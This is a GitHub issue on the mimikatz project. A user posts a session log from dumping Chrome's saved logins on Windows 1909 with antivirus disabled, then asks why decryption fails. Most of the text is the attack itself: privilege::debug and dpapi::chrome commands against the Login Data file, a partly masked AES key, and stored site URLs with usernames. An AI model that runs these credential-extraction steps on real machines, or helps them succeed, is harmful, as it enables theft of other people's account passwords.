Windows 1909 chrome logins

Hello: Win 1909 x64 local user. Avast is Disabled. mimikatz 2.2.0 20200918 Zerologon encrypted

Using 'mimikatz.log' for logfile : OK

mimikatz # version

mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 18363 (arch x64) msvc 150030729 207

SecureKernel is running

mimikatz # privilege::debug Privilege '20' OK

mimikatz # dpapi::chrome /in:"%systemdrive%\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Encrypted Key found in local state file Encrypted Key seems to be protected by DPAPI

using CryptUnprotectData API AES Key is: 20xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxed

URL : https://login.live.com/ ( https://login.live.com/ppsecure/post.srf ) Username: email@hotmail.com

using BCrypt with AES-256-GCM ERROR kuhl_m_dpapi_chrome_decrypt ; BCryptDecrypt: 0xc000a002

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: email@hotmail.com

using BCrypt with AES-256-GCM ERROR kuhl_m_dpapi_chrome_decrypt ; BCryptDecrypt: 0xc000a002

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: email@outlook.com

using BCrypt with AES-256-GCM ERROR kuhl_m_dpapi_chrome_decrypt ; BCryptDecrypt: 0xc000a002

URL : https://www.locast.org/ ( https://www.locast.org/ ) Username:

using BCrypt with AES-256-GCM ERROR kuhl_m_dpapi_chrome_decrypt ; BCryptDecrypt: 0xc000a002

URL : http://95.141.193.17/LOGIN: rsload.net, PASSWORD: password ( http://95.141.193.17/ ) Username: rsload.net

using BCrypt with AES-256-GCM ERROR kuhl_m_dpapi_chrome_decrypt ; BCryptDecrypt: 0xc000a002

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: email@hotmail.com

using BCrypt with AES-256-GCM ERROR kuhl_m_dpapi_chrome_decrypt ; BCryptDecrypt: 0xc000a002

mimikatz #

I noticed there's a service name lsalso.exe is running.I read is Windows Defender Credential Guard but I have Windows Home.

Any info much appreciated.

gentilkiwi / mimikatz

Windows 1909 chrome logins #320